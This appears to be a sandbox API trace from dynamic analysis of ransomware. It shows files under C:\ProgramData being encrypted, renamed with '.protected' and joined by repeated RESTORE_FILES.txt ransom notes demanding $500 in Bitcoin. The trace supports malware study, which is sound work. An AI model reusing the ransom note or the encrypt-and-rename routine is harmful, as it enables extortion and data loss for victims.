lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.353] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0077.353] CloseHandle (hObject=0xd4) returned 1 [0077.354] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0077.355] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0077.355] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 109 [0077.355] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0077.355] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.355] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0077.356] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0077.356] WriteFile (in: hFile=0xb4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0077.356] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.356] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0077.356] CloseHandle (hObject=0xb4) returned 1 [0077.356] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0077.356] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0077.357] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\RESTORE_FILES.txt") returned 100 [0077.357] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0077.358] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.358] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0077.359] lstrlenA (lpString="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") returned 684 [0077.359] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0077.359] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.359] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0077.359] CloseHandle (hObject=0xa4) returned 1 [0077.359] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0077.359] FindClose (in: hFindFile=0x494b80 | out: hFindFile=0x494b80) returned 1 [0077.359] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\RESTORE_FILES.txt") returned 50 [0077.359] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0077.360] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.360] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0077.361] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0077.361] WriteFile (in: hFile=0xac, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0077.361] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.361] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0077.361] CloseHandle (hObject=0xac) returned 1 [0077.361] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0077.361] lstrcmpiW (lpString1="Start Menu", lpString2="Windows") returned -1 [0077.361] lstrcmpiW (lpString1="Start Menu", lpString2="Program Files") returned 1 [0077.361] lstrcmpiW (lpString1="Start Menu", lpString2="Program Files (x86)") returned 1 [0077.361] lstrcmpiW (lpString1="Start Menu", lpString2="$Recycle.bin") returned 1 [0077.361] lstrcmpiW (lpString1="Start Menu", lpString2="System Volume Information") returned -1 [0077.361] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Start Menu") returned 29 [0077.361] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0077.361] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0077.361] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Start Menu\\*") returned 31 [0077.361] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Start Menu\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0xffffffff [0077.361] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0077.361] lstrcmpiW 
(lpString1="Sun", lpString2="Windows") returned -1 [0077.361] lstrcmpiW (lpString1="Sun", lpString2="Program Files") returned 1 [0077.361] lstrcmpiW (lpString1="Sun", lpString2="Program Files (x86)") returned 1 [0077.361] lstrcmpiW (lpString1="Sun", lpString2="$Recycle.bin") returned 1 [0077.362] lstrcmpiW (lpString1="Sun", lpString2="System Volume Information") returned -1 [0077.362] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun") returned 22 [0077.362] lstrcmpW (lpString1="Sun", lpString2=".") returned 1 [0077.362] lstrcmpW (lpString1="Sun", lpString2="..") returned 1 [0077.362] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\*") returned 24 [0077.362] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x494b80 [0077.364] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.364] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.364] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.364] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.365] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.365] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\.") returned 24 [0077.365] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.365] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0077.365] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.365] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.365] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.365] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.365] lstrcmpiW (lpString1="..", lpString2="System 
Volume Information") returned -1 [0077.365] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\..") returned 25 [0077.365] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.365] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.365] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0077.365] lstrcmpiW (lpString1="Java", lpString2="Windows") returned -1 [0077.365] lstrcmpiW (lpString1="Java", lpString2="Program Files") returned -1 [0077.365] lstrcmpiW (lpString1="Java", lpString2="Program Files (x86)") returned -1 [0077.365] lstrcmpiW (lpString1="Java", lpString2="$Recycle.bin") returned 1 [0077.365] lstrcmpiW (lpString1="Java", lpString2="System Volume Information") returned -1 [0077.365] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java") returned 27 [0077.365] lstrcmpW (lpString1="Java", lpString2=".") returned 1 [0077.366] lstrcmpW (lpString1="Java", lpString2="..") returned 1 [0077.366] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\*") returned 29 [0077.366] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0077.366] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.366] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.366] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.366] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.366] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.366] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\.") returned 29 [0077.366] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.366] 
FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0077.367] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.367] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.367] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.367] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.367] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.367] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\..") returned 30 [0077.367] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.367] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.367] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0077.367] lstrcmpiW (lpString1="Java Update", lpString2="Windows") returned -1 [0077.367] lstrcmpiW (lpString1="Java Update", lpString2="Program Files") returned -1 [0077.367] lstrcmpiW (lpString1="Java Update", lpString2="Program Files (x86)") returned -1 [0077.367] lstrcmpiW (lpString1="Java Update", lpString2="$Recycle.bin") returned 1 [0077.367] lstrcmpiW (lpString1="Java Update", lpString2="System Volume Information") returned -1 [0077.367] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update") returned 39 [0077.367] lstrcmpW (lpString1="Java Update", lpString2=".") returned 1 [0077.367] lstrcmpW (lpString1="Java Update", lpString2="..") returned 1 [0077.368] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*") returned 41 [0077.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0077.368] lstrcmpiW (lpString1=".", 
lpString2="Windows") returned -1 [0077.368] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.368] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.368] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.368] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.368] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\.") returned 41 [0077.368] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.368] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0077.368] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.368] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.368] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.369] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.369] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.369] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\..") returned 42 [0077.369] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.369] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.369] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0077.369] lstrcmpiW (lpString1="jaureglist.xml", lpString2="Windows") returned -1 [0077.369] lstrcmpiW (lpString1="jaureglist.xml", lpString2="Program Files") returned -1 [0077.369] lstrcmpiW (lpString1="jaureglist.xml", lpString2="Program Files (x86)") returned -1 [0077.369] lstrcmpiW (lpString1="jaureglist.xml", lpString2="$Recycle.bin") returned 1 [0077.369] lstrcmpiW (lpString1="jaureglist.xml", lpString2="System Volume Information") returned -1 [0077.369] wnsprintfW (in: pszDest=0x4f3bf8, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml") returned 54 [0077.369] StrStrIW (lpFirst="jaureglist.xml", lpSrch=".protected") returned 0x0 [0077.369] lstrcmpW (lpString1="jaureglist.xml", lpString2="RESTORE_FILES.txt") returned -1 [0077.369] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0077.369] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0077.369] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0077.369] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml") returned 54 [0077.369] StrStrW (lpFirst="jaureglist.xml", lpSrch=".txt") returned 0x0 [0077.369] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml") returned 54 [0077.369] StrStrW (lpFirst="jaureglist.xml", lpSrch=".rar") returned 0x0 [0077.369] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml") returned 54 [0077.369] StrStrW (lpFirst="jaureglist.xml", lpSrch=".zip") returned 0x0 [0077.370] ReadFile (in: hFile=0xd4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ef04*=0x77, lpOverlapped=0x0) returned 1 [0077.370] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff89, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.370] WriteFile (in: hFile=0xd4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x77, 
lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ef04*=0x77, lpOverlapped=0x0) returned 1 [0077.370] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.370] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0077.371] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0077.371] CloseHandle (hObject=0xd4) returned 1 [0077.371] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml.protected") returned 64 [0077.371] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml.protected" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml.protected")) returned 1 [0077.371] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0077.372] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0077.372] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\RESTORE_FILES.txt") returned 57 [0077.372] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\sun\\java\\java update\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0077.372] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.372] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0077.372] lstrlenA (lpString="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") returned 684 [0077.372] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, 